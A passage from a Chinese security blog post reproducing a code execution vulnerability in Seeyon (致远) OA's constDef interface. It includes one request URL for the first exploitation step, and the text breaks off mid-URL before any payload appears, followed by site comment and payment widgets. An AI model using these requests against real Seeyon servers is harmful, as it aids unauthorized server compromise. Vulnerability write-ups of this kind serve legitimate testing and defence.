[漏洞复现]致远在野nday constDef接口存在代码执行漏洞

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

炒个冷饭,虽然是个23年hw爆出来的洞,但是网上没有公开利用的信息,而且在hw中配合致远的权限绕过也成功过几次,感觉能打的还是有一些的。

漏洞简介

致远OA是一款面向企业的办公自动化软件,设计理念是以人为中心,提供全面的协同办公解决方案。它由北京致远互联软件股份有限公司开发,自2002年成立以来,致力于提供协同办公产品的设计、研发、销售及服务。致远OA不仅支持基本的办公自动化功能,如‌流程审批、‌信息共享和‌文档处理,还提供了高级功能如‌移动办公和‌集成第三方系统,以适应不同规模企业的需求。攻击者可通过代码执行漏洞获取服务器权限。

漏洞复现

首先新建一个常量,constKey(常量名)为demo。

/seeyon/constDef.do?method=newConstDef&constKey=demo&constDefine=1&constDescription=123&constType=4

可以通过如下接口查看常量是否新建完成。

/seeyon/ajax.do?method=ajaxAction&a
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值